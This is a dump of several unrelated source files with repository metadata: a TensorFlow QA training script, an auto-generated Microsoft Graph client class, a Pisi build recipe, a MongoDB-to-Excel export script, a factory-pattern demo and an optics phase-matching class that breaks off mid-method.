total_loss, opt = sess.run(
[self.total_loss, self.opt], feed_dict={self.handle: self.train_iterator_handle, self.keep_prob: 0.75}) # , options=options, run_metadata=run_metadata)
progress.update(index, [("training loss", total_loss)])
except tf.errors.OutOfRangeError:
break
print(
'evaluation on 500 training elements:')
preds, contexts, answers = sess.run([self.preds, self.contexts, self.answers], feed_dict={
self.handle: self.train_eval_iterator_handle, self.keep_prob: 1.0})
predictions = []
ground_truths = []
for i in range(len(preds)):
predictions.append(convert_indices_to_text(
self.vocabulary, contexts[i], preds[i, 0], preds[i, 1]))
ground_truths.append(convert_indices_to_text(
self.vocabulary, contexts[i], answers[i, 0], answers[i, 1]))
print(evaluate(predictions, ground_truths))
print(
'evaluation on 500 validation elements:')
preds, contexts, answers = sess.run([self.preds, self.contexts, self.answers], feed_dict={
self.handle: self.val_iterator_handle, self.keep_prob: 1.0})
predictions = []
ground_truths = []
for i in range(len(preds)):
predictions.append(convert_indices_to_text(
self.vocabulary, contexts[i], preds[i, 0], preds[i, 1]))
ground_truths.append(convert_indices_to_text(
self.vocabulary, contexts[i], answers[i, 0], answers[i, 1]))
print(evaluate(predictions, ground_truths))
predictions = []
ground_truths = []
# writer.close()
if __name__ == '__main__':
    print("ok")
    # Pretrained word vectors and the id<->token vocabulary used to decode
    # predicted spans back into text.
    embedding = load_word_embeddings()
    vocabulary = load_vocabulary()
    # with tf.Session() as sess:
    # z = sess.run([y])
    # print('embedding', y.get_shape(), z)
    # print("shapes", embedding.shape)
    # Training set: (question, len), (context, len), answer span files zipped
    # into one dataset of triples.
    train_questions = with_length(create_dataset("train.ids.question"))
    train_answers = create_dataset("train.span")
    train_context = with_length(create_dataset("train.ids.context"))
    train_dataset = tf.data.Dataset.zip(
        (train_questions, train_context, train_answers))
    # Validation set, same structure.
    val_questions = with_length(create_dataset("val.ids.question"))
    val_answers = create_dataset("val.span")
    val_context = with_length(create_dataset("val.ids.context"))
    val_dataset = tf.data.Dataset.zip(
        (val_questions, val_context, val_answers))
    # with tf.Session() as sess:
    # sess.run(iterator.initializer)
    # x = iterator.get_next()
    # a = sess.run([x])
    # print(x.output_shapes, a)
    # Build the model graph and train for 10 epochs.
    machine = Baseline(train_dataset, val_dataset,
                       embedding, vocabulary, batch_size=32)
    machine.build()
    machine.train(10)
| [
"amaroukaci@MacBook-Pro-de-Amar.local"
] | amaroukaci@MacBook-Pro-de-Amar.local |
0ef8047e301f8b79d8060b4e0aa3ee0698f6838f | f8da830331428a8e1bbeadf23345f79f1750bd98 | /msgraph-cli-extensions/v1_0/identitydirmgt_v1_0/azext_identitydirmgt_v1_0/vendored_sdks/identitydirmgt/operations/_directory_role_template_directory_role_template_operations.py | e7eb0324c20421ffb6c86524e22d669d23d9b2ee | [
"MIT"
] | permissive | ezkemboi/msgraph-cli | e023e1b7589461a738e42cbad691d9a0216b0779 | 2ceeb27acabf7cfa219c8a20238d8c7411b9e782 | refs/heads/main | 2023-02-12T13:45:03.402672 | 2021-01-07T11:33:54 | 2021-01-07T11:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,977 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
# NOTE: AutoRest-generated operation group for the /directoryRoleTemplates
# Microsoft Graph endpoint. Regenerating the client will overwrite manual
# code changes here, so this block carries review comments only.
class DirectoryRoleTemplateDirectoryRoleTemplateOperations(object):
    """DirectoryRoleTemplateDirectoryRoleTemplateOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~identity_directory_management.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = models

    def __init__(self, client, config, serializer, deserializer):
        # Wires the shared pipeline client and the (de)serializers into this
        # operation group; called by the generated service client.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    def list_directory_role_template(
        self,
        orderby=None, # type: Optional[List[Union[str, "models.Enum65"]]]
        select=None, # type: Optional[List[Union[str, "models.Enum66"]]]
        expand=None, # type: Optional[List[str]]
        **kwargs # type: Any
    ):
        # type: (...) -> Iterable["models.CollectionOfDirectoryRoleTemplate"]
        """Get entities from directoryRoleTemplates.

        Get entities from directoryRoleTemplates.

        :param orderby: Order items by property values.
        :type orderby: list[str or ~identity_directory_management.models.Enum65]
        :param select: Select properties to be returned.
        :type select: list[str or ~identity_directory_management.models.Enum66]
        :param expand: Expand related entities.
        :type expand: list[str]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either CollectionOfDirectoryRoleTemplate or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~identity_directory_management.models.CollectionOfDirectoryRoleTemplate]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfDirectoryRoleTemplate"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        def prepare_request(next_link=None):
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            # NOTE(review): 'Accept' is assigned twice; the literal overwrites
            # the serialized value (harmless AutoRest codegen quirk).
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            header_parameters['Accept'] = 'application/json'
            if not next_link:
                # First page: build the URL and the OData query parameters.
                # Construct URL
                url = self.list_directory_role_template.metadata['url']  # type: ignore
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                if self._config.top is not None:
                    query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
                if self._config.skip is not None:
                    query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
                if self._config.search is not None:
                    query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
                if self._config.filter is not None:
                    query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
                if self._config.count is not None:
                    query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
                if orderby is not None:
                    query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
                if select is not None:
                    query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
                if expand is not None:
                    query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # Continuation link already embeds the query string, so no
                # extra query parameters are added.
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        def extract_data(pipeline_response):
            # Pull the page's items and the odata.nextLink continuation token.
            deserialized = self._deserialize('CollectionOfDirectoryRoleTemplate', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.odata_next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                # NOTE(review): here the error body is deserialized before
                # map_error, the reverse of the other methods in this class
                # (both orders work; map_error raises only on mapped codes).
                error = self._deserialize(models.OdataError, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

            return pipeline_response

        return ItemPaged(
            get_next, extract_data
        )
    list_directory_role_template.metadata = {'url': '/directoryRoleTemplates'}  # type: ignore

    def create_directory_role_template(
        self,
        id=None, # type: Optional[str]
        deleted_date_time=None, # type: Optional[datetime.datetime]
        description=None, # type: Optional[str]
        display_name=None, # type: Optional[str]
        **kwargs # type: Any
    ):
        # type: (...) -> "models.MicrosoftGraphDirectoryRoleTemplate"
        """Add new entity to directoryRoleTemplates.

        Add new entity to directoryRoleTemplates.

        :param id: Read-only.
        :type id: str
        :param deleted_date_time:
        :type deleted_date_time: ~datetime.datetime
        :param description: The description to set for the directory role. Read-only.
        :type description: str
        :param display_name: The display name to set for the directory role. Read-only.
        :type display_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: MicrosoftGraphDirectoryRoleTemplate, or the result of cls(response)
        :rtype: ~identity_directory_management.models.MicrosoftGraphDirectoryRoleTemplate
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphDirectoryRoleTemplate"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))

        # Flat keyword arguments are folded into the request-body model.
        _body = models.MicrosoftGraphDirectoryRoleTemplate(id=id, deleted_date_time=deleted_date_time, description=description, display_name=display_name)
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.create_directory_role_template.metadata['url']  # type: ignore

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        header_parameters['Accept'] = 'application/json'

        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(_body, 'MicrosoftGraphDirectoryRoleTemplate')
        body_content_kwargs['content'] = body_content
        request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('MicrosoftGraphDirectoryRoleTemplate', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    create_directory_role_template.metadata = {'url': '/directoryRoleTemplates'}  # type: ignore

    def get_directory_role_template(
        self,
        directory_role_template_id, # type: str
        select=None, # type: Optional[List[Union[str, "models.Enum67"]]]
        expand=None, # type: Optional[List[str]]
        **kwargs # type: Any
    ):
        # type: (...) -> "models.MicrosoftGraphDirectoryRoleTemplate"
        """Get entity from directoryRoleTemplates by key.

        Get entity from directoryRoleTemplates by key.

        :param directory_role_template_id: key: id of directoryRoleTemplate.
        :type directory_role_template_id: str
        :param select: Select properties to be returned.
        :type select: list[str or ~identity_directory_management.models.Enum67]
        :param expand: Expand related entities.
        :type expand: list[str]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: MicrosoftGraphDirectoryRoleTemplate, or the result of cls(response)
        :rtype: ~identity_directory_management.models.MicrosoftGraphDirectoryRoleTemplate
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphDirectoryRoleTemplate"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.get_directory_role_template.metadata['url']  # type: ignore
        path_format_arguments = {
            'directoryRoleTemplate-id': self._serialize.url("directory_role_template_id", directory_role_template_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        if select is not None:
            query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        header_parameters['Accept'] = 'application/json'

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('MicrosoftGraphDirectoryRoleTemplate', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get_directory_role_template.metadata = {'url': '/directoryRoleTemplates/{directoryRoleTemplate-id}'}  # type: ignore

    def update_directory_role_template(
        self,
        directory_role_template_id, # type: str
        id=None, # type: Optional[str]
        deleted_date_time=None, # type: Optional[datetime.datetime]
        description=None, # type: Optional[str]
        display_name=None, # type: Optional[str]
        **kwargs # type: Any
    ):
        # type: (...) -> None
        """Update entity in directoryRoleTemplates.

        Update entity in directoryRoleTemplates.

        :param directory_role_template_id: key: id of directoryRoleTemplate.
        :type directory_role_template_id: str
        :param id: Read-only.
        :type id: str
        :param deleted_date_time:
        :type deleted_date_time: ~datetime.datetime
        :param description: The description to set for the directory role. Read-only.
        :type description: str
        :param display_name: The display name to set for the directory role. Read-only.
        :type display_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))

        _body = models.MicrosoftGraphDirectoryRoleTemplate(id=id, deleted_date_time=deleted_date_time, description=description, display_name=display_name)
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.update_directory_role_template.metadata['url']  # type: ignore
        path_format_arguments = {
            'directoryRoleTemplate-id': self._serialize.url("directory_role_template_id", directory_role_template_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(_body, 'MicrosoftGraphDirectoryRoleTemplate')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    update_directory_role_template.metadata = {'url': '/directoryRoleTemplates/{directoryRoleTemplate-id}'}  # type: ignore

    def delete_directory_role_template(
        self,
        directory_role_template_id, # type: str
        if_match=None, # type: Optional[str]
        **kwargs # type: Any
    ):
        # type: (...) -> None
        """Delete entity from directoryRoleTemplates.

        Delete entity from directoryRoleTemplates.

        :param directory_role_template_id: key: id of directoryRoleTemplate.
        :type directory_role_template_id: str
        :param if_match: ETag.
        :type if_match: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.delete_directory_role_template.metadata['url']  # type: ignore
        path_format_arguments = {
            'directoryRoleTemplate-id': self._serialize.url("directory_role_template_id", directory_role_template_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        # Optimistic concurrency: only delete when the server ETag matches.
        if if_match is not None:
            header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    delete_directory_role_template.metadata = {'url': '/directoryRoleTemplates/{directoryRoleTemplate-id}'}  # type: ignore
| [
"japhethobalak@gmail.com"
] | japhethobalak@gmail.com |
f55900e54ef00863d8b784cba0e718dd5da9d58b | e00d41c9f4045b6c6f36c0494f92cad2bec771e2 | /hardware/misc/redshift/actions.py | f3306205d733debeae52481a7ff60929d4d62998 | [] | no_license | pisilinux/main | c40093a5ec9275c771eb5fb47a323e308440efef | bfe45a2e84ea43608e77fb9ffad1bf9850048f02 | refs/heads/master | 2023-08-19T00:17:14.685830 | 2023-08-18T20:06:02 | 2023-08-18T20:06:02 | 37,426,721 | 94 | 295 | null | 2023-09-14T08:22:22 | 2015-06-14T19:38:36 | Python | UTF-8 | Python | false | false | 948 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
    """Configure the redshift sources: systemd user units plus the DRM,
    GeoClue2, RandR and VidMode backends."""
    #shelltools.export("PYTHON", "/usr/bin/python3.6")
    autotools.configure("--sysconfdir=/etc \
                        --enable-drm \
                        --enable-geoclue2 \
                        --enable-randr \
                        --enable-vidmode \
                        --with-systemduserunitdir=/usr/lib/systemd/user")
    # Inject -Wl,-O1,--as-needed into libtool's link line to avoid overlinking.
    pisitools.dosed("libtool", " -shared ", " -Wl,-O1,--as-needed -shared ")
def build():
    """Compile the configured sources."""
    autotools.make()
def install():
    """Install into the package staging directory and ship the docs."""
    #autotools.install()
    # rawInstall is used so DESTDIR points at the pisi staging directory.
    autotools.rawInstall("DESTDIR=%s" % get.installDIR())
    pisitools.dodoc("CONTRIB*", "COPYING", "README*")
| [
"muscnsl@hotmail.com"
] | muscnsl@hotmail.com |
55643a0d93c4f29688a49a0228d26ac0e38d1ca6 | be98d0d6301b93523207e9be4d35e9c0cc9fc566 | /shopnt/prod_to_xls.py | c6236501993cb69d1637b0c302088eb4afa23baf | [] | no_license | teacherSsamko/crawler | a0d9028665c4f5533fc739bf869f803ba814ff4d | 1cd4a3c4c5140d015f49f444ec08321ad6ad24d4 | refs/heads/main | 2023-02-23T23:23:56.122758 | 2021-01-31T23:59:53 | 2021-01-31T23:59:53 | 323,949,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 835 | py | import os
import datetime
from openpyxl import Workbook, load_workbook
from pymongo import MongoClient
# Export every scraped product document from MongoDB into a dated Excel file.
mongo = MongoClient("mongodb://localhost:27017")
db = mongo['aircode']
col = db['shopnt_prod']

today = datetime.date.today()
BASE_DIR = os.path.dirname(os.path.realpath(__file__))

# Column order shared by the header row and every data row.
FIELDS = ['prod_id', 'prod_name', 'price', 'score', 'score_persons', 'img_url']

prod_xls = Workbook()
sheet = prod_xls.active
sheet.append(FIELDS)
for doc in col.find():
    sheet.append([doc[field] for field in FIELDS])

prod_xls.save(os.path.join(BASE_DIR, f'prods_{today}.xlsx'))
"ssamko@gdflab.com"
] | ssamko@gdflab.com |
5d6bc8f73dad42c04c8512ac6b4eb900548dd9ef | c089ca6a1dbb4c4a9ed039adf3a3d0f768039209 | /factory/client.py | 0444831104c4aa4cca87558ab6ae586cd030112e | [] | no_license | shubham-chhimpa/design-pattern-python-3 | 3e98f2c742935b39e29ede7a3acf58ceb716e097 | 939d0455a26a7a723c73dd042df20def3c5d68a9 | refs/heads/main | 2023-07-01T17:02:05.705384 | 2021-08-01T13:49:46 | 2021-08-01T13:49:46 | 391,400,536 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from factory.chair import Chair
from factory.chair_factory import ChairFactory, ChairType
if __name__ == '__main__':
chair: Chair = ChairFactory.get_chair(ChairType.BIG)
print(chair.get_dimension())
| [
"chhimpa.shubh04@gmail.com"
] | chhimpa.shubh04@gmail.com |
b81c1c5060c9040565fb0e296101b4a288efed15 | c4f4e59e998a093b7a005323ee36a0ab1ed2738c | /NLO_simulation/src/genericCrystal.py | b1f9108a77c52a6a018871e68e5cb4c08adce1d4 | [] | no_license | patinkaew/slac_mec | 98a4842fda0685166108f984dc2504e7864ed6c9 | bdce4135a8a0617d2dd41ee80309b7d6f2d698bb | refs/heads/master | 2022-11-12T10:24:48.988523 | 2020-06-25T02:54:35 | 2020-06-25T02:54:35 | 274,289,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,129 | py | import numpy as np
from pandas import read_csv, DataFrame
import collections
from pynlo.media.crystals.CrystalContainer import Crystal
from utils import *
class genericCrystal(Crystal):
    """Uniaxial nonlinear crystal described by a dict of material parameters.

    The dict may hold: name, temperature, mode, n_o/n_e (callables of
    (wavelength_nm, temperature)), n2, theta, deff, plus the 'length' and
    'enable_catching' keys consumed by the pynlo Crystal base class.
    Missing keys read as 0.0 via defaultdict(float).
    """

    def __init__(self, data=None):
        """Initialize the crystal from a parameter dict.

        :param data: crystal parameter dict (see class docstring); the base
            class only consumes 'length' and 'enable_catching'.
        """
        # BUGFIX: the old signature used a mutable default (`data={}`), a
        # single dict object shared by every call; use None as the sentinel.
        data = {} if data is None else data
        super().__init__(data)  # only contains length and enable_catching
        self.data = collections.defaultdict(float, data)
        self.process_data()
    def process_data(self):
        """Unpack self.data into attributes.

        self.data is a defaultdict(float) (see __init__), so any key absent
        from the supplied dict silently becomes 0.0 here.
        """
        # general information
        self.name = self.data['name']
        self.temp = self.data['temperature']
        self.mode = self.data['mode']
        # refractive index, assuming function n(wavelength_nm, temperature)
        self.n_o = self.data['n_o'] # ordinary axis
        self.n_e = self.data['n_e'] # extraordinary axis
        # refractive index
        self.n2 = self.data['n2'] # nonlinear refractive index
        self.theta = self.data['theta'] # phase matching mixing angle
        self.deff = self.data['deff'] # effective nonlinear coefficient
    def load_crystal_data(self, filename): # load data from csv file
        """Load crystal parameters from a CSV file. UNFINISHED — see notes.

        NOTE(review): as written this method never updates self.data:
        `df.fillna('')` discards its result (not inplace), and the dict from
        `df.to_dict(...)` is thrown away, so process_data() re-reads the old
        values. The commented-out helper suggests a 'parameter/value/unit'
        schema with unit conversion was intended — TODO confirm and finish.
        """
        df = read_csv(filename, sep = ',', index_col = 0)
        df.fillna('')
        # def parse_unit_conversion(df, parameter, value, to_unit):
        #     read = df.loc[parameter, value]
        #     from_unit = df.loc[parameter, 'unit']
        #     return convert_unit(read, from_unit, to_unit)
        df.set_index('parameter', drop=True, inplace=True)
        df.to_dict(orient = 'list')
        self.process_data()
    def set_mixing_angle(self, angle):
        """Set the phase-matching angle theta (radians — mix_refractive_index
        feeds it straight into np.sin/np.cos)."""
        self.theta = angle
    def set_temperature(self, temperature):
        """Set the crystal temperature passed to the n_o/n_e index functions."""
        self.temp = temperature
    def mix_refractive_index(self, n_o, n_e):
        """Index-ellipsoid mix of n_o and n_e at angle self.theta (radians):
        n(theta) = n_o*n_e / sqrt(n_o^2 sin^2(theta) + n_e^2 cos^2(theta))."""
        return n_o*n_e / np.sqrt(n_o**2 * np.sin(self.theta)**2 + n_e**2 * np.cos(self.theta)**2)
    def n_mix(self, wavelength_nm, temperature):
        """Angle-mixed index at wavelength_nm.

        NOTE(review): the `temperature` argument is ignored — the stored
        self.temp is used instead, matching refractive_index(). Confirm
        whether the parameter should be honored or dropped.
        """
        n_o = self.n_o(wavelength_nm, self.temp)
        n_e = self.n_e(wavelength_nm, self.temp)
        return self.mix_refractive_index(n_o, n_e)
    def refractive_index(self, wavelength_nm, axis = 'mix'):
        """Refractive index at wavelength_nm, evaluated at self.temp.

        axis: 'o' ordinary, 'e' extraordinary, 'all' -> (n_o, n_e, n_mix);
        any other value returns the angle-mixed index at self.theta.
        """
        # sellmeier and temperature-dispersion equations
        n_o = self.n_o(wavelength_nm, self.temp)
        n_e = self.n_e(wavelength_nm, self.temp)
        n_mix = self.mix_refractive_index(n_o, n_e)
        if axis == 'o':
            return n_o
        elif axis == 'e':
            return n_e
        elif axis == 'all':
            return n_o, n_e, n_mix
        else: # default to mix
            return n_mix
    def n(self, wl_nm, axis = 'mix'): # wrapper for refractive index
        """Shorthand for refractive_index(wl_nm, axis)."""
        return self.refractive_index(wl_nm, axis)
# pynlo's original phasematch function
def phasematch(self, pump_wl_nm, sgnl_wl_nm, idlr_wl_nm, return_wavelength = False):
RET_WL = False
new_wl = 0.0
if pump_wl_nm is None:
pump_wl_nm = 1.0/(1.0/idlr_wl_nm + 1.0/sgnl_wl_nm)
print('Setting pump to ',pump_wl_nm )
RET_WL = True
new_wl = pump_wl_nm
if sgnl_wl_nm is None:
sgnl_wl_nm = 1.0/(1.0/pump_wl_nm - 1.0/idlr_wl_nm)
print('Setting signal to ',sgnl_wl_nm)
RET_WL = True
new_wl = sgnl_wl_nm
if idlr_wl_nm is None:
idlr_wl_nm = 1.0/(1.0/pump_wl_nm - 1.0/sgnl_wl_nm)
print('Setting idler to ',idlr_wl_nm)
RET_WL = True
new_wl = idlr_wl_nm
kp_0 = 2*np.pi/pump_wl_nm
ks = self.n(sgnl_wl_nm, axis = 'o')*2*np.pi/sgnl_wl_nm
ki = self.n(idlr_wl_nm, axis = 'o')*2*np.pi/idlr_wl_nm
n_soln = (ks+ki) / kp_0
n_o, n_e, n_mix = self.n(pump_wl_nm, 'all')
print('n_e @ pump: ',n_e, '\n n_o @ pump: ',n_o, ';\t n_mix @ pump: ', n_mix)
a = n_e**2 - n_o**2
b = 0.0
c = n_o**2 - n_e**2 * n_o**2 / (n_soln**2)
x = ( -b + np.sqrt(b**2-4*a*c) )/ (2.0 * a)
if x < 0:
x = ( -b - np.sqrt(b**2-4*a*c) )/ (2.0 * a)
if np.isnan(np.arccos(x)) :
raise exceptions.AttributeError('No phase matching condition.')
theta = np.arccos(x)
print('Angle set to ',360*theta / (2.0*np.pi) )
if RET_WL and return_wavelength:
return (theta, new_wl)
else:
return theta
# phase matching, support various types
def phasematching(self, pump_wl_nm, sgnl_wl_nm, idlr_wl_nm, type = 1, verbose = False):
# conservation of energy: pump_frequency = signal_frequency + idler_frequency
# compute the phasematching wavelength for pulse with no input wavelength
if pump_wl_nm is None or pump_wl_nm == 0:
pump_wl_nm = 1.0/(1.0/idlr_wl_nm + 1.0/sgnl_wl_nm)
if verbose: print('Setting pump wavelength to ', pump_wl_nm)
if sgnl_wl_nm is None or sgnl_wl_nm == 0:
sgnl_wl_nm = 1.0/(1.0/pump_wl_nm - 1.0/idler_wl_nm)
if verbose: print('Setting signal wavelength to ', sgnl_wl_nm)
if idlr_wl_nm is None or idlr_wl_nm == 0:
idlr_wl_nm = 1.0/(1.0/pump_wl_nm - 1.0/sgnl_wl_nm)
if verbose: print('Setting idler wavelength to ', idlr_wl_nm)
if type == 1 or type == 'type1':
match_axis = ('e', 'o', 'o') # pump_axis, signal_axis, idler_axis
elif type == 2 or type == 'type2':
match_axis = ('e', 'e', 'o')
elif type == 3 or type == 'type3':
# this is actually called type 2 phasematching,
# we will name it type 3 to dinstinguish from type 2, just for code
match_axis = ('e', 'o', 'e')
if verbose: print('matching at pump {}, signal {}, idler {}'.format(*match_axis))
# compute match refractive index
k_pump0 = 2*np.pi/pump_wl_nm # wave vector of pump pulse in air
n_sgnl = self.n(sgnl_wl_nm, axis = match_axis[1])
k_sgnl = n_sgnl * 2*np.pi/sgnl_wl_nm # wave vector of signal pulse in crystal
n_idlr = self.n(idlr_wl_nm, axis = match_axis[2])
k_idlr = n_idlr * 2*np.pi/idlr_wl_nm # wave vector of pump pulse in crystal
# phasematching condition: k_sgnl + k_idlr = k_pump in crystal
n_soln = (k_sgnl + k_idlr) / k_pump0 # target refractive index for pump if exists
n_o, n_e, n_mix = self.n(pump_wl_nm, 'all') # refractive index data in crystal
# check whether there exists phase matching angle
a = n_e**2 - n_o**2
b = 0.0
c = n_o**2 - n_e**2 * n_o**2 / (n_soln**2)
x = ( -b + np.sqrt(b**2-4*a*c) )/ (2.0 * a)
if x < 0:
x = ( -b - np.sqrt(b**2-4*a*c) )/ (2.0 * a)
if np.isnan(np.arccos(x)) :
theta = None
if verbose: print('No phase matching condition')
else:
theta = 180*np.arccos(x)/np.pi
self.theta = theta
if verbose: print('Angle set to ', theta)
return (theta, pump_wl_nm, n_soln, match_axis[0], sgnl_wl_nm, n_sgnl, match_axis[1], idlr_wl_nm, n_idlr, match_axis[2])
    # compute all possible phase matching, similar to qmix in SNLO
    def qmix(self, pump_wl_nm, sgnl_wl_nm, idlr_wl_nm, verbose = False):
        """Try type-1/2/3 phase matching and print every condition that exists.

        Pass None/0 for at most one wavelength to have phasematching() fill
        it in from energy conservation.

        :returns: list of the three phasematching(...) result tuples.
        """
        types = [1, 2, 3]
